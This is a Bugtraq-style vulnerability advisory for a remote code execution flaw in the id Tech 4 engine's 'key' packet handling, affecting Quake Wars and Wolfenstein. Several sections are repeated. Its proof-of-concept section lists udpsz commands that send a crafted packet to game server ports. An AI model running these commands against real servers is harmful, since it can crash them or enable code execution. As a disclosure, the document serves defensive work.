id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
BID:41460
Info
id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
| Bugtraq ID: | 41460 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 05 2010 12:00AM |
| Updated: | Jul 05 2010 12:00AM |
| Credit: | Luigi Auriemma |
| Vulnerable: |
id Software Wolfenstein 1.3.3442 id Software id Tech 4 Engine 0 id Software Enemy Territory: Quake Wars 1.5.12642.33243 id Software Enemy Territory: Quake Wars 0 |
| Not Vulnerable: | |
Discussion
id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
id Tech 4 Engine is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
The following applications include the vulnerable engine:
Enemy Territory: Quake Wars 1.5.12642.33243 and prior
Wolfenstein 1.3.344272 and prior
id Tech 4 Engine is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
The following applications include the vulnerable engine:
Enemy Territory: Quake Wars 1.5.12642.33243 and prior
Wolfenstein 1.3.344272 and prior
Exploit / POC
id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
The following proof of concept is available:
Enemy Territory: Quake Wars:
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27733 500
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27733 5
Wolfenstein:
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27758 500
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27758 5
The following proof of concept is available:
Enemy Territory: Quake Wars:
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27733 500
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27733 5
Wolfenstein:
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27758 500
udpsz -P example.com -p 1234 -C ffff6b657900 SERVER 27758 5
Solution / Fix
id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability
References:
References:
- negative memcpy with possible code execution (Luigi Auriemma)
- Vendor Homepage (id Software)